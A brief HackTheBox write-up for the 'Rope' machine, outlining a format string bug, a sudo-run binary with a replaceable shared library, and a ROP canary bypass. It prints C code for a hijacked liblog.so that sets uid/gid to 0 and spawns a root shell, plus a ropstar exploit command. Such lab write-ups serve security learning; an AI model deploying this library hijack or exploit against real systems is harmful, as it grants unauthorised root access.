Post

Rope @ HackTheBox

Rope is a 50-point machine on HackTheBox that involves 3 binary exploits. There is a format string vulnerability in the boxes’s webserver and a replaceable shared library used by a binary we can run with sudo. Finally there is another binary where we have to bypass a stack canary and use ROP.

Notes

The user exploit.

Liblog.so:

1
2
3
4
5
6
7
8
9
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

void printlog(){
    setuid(0);
    setgid(0);
    system("/bin/sh",NULL,NULL);
}

The root exploit.

Solving with ropstar:

1
python3 ~/tools/ropstar/ropstar.py -rhost localhost -rport 1337 -remote_offset ./contact

Thanks r4j for creating this fun box!

This post is licensed under CC BY 4.0 by the author.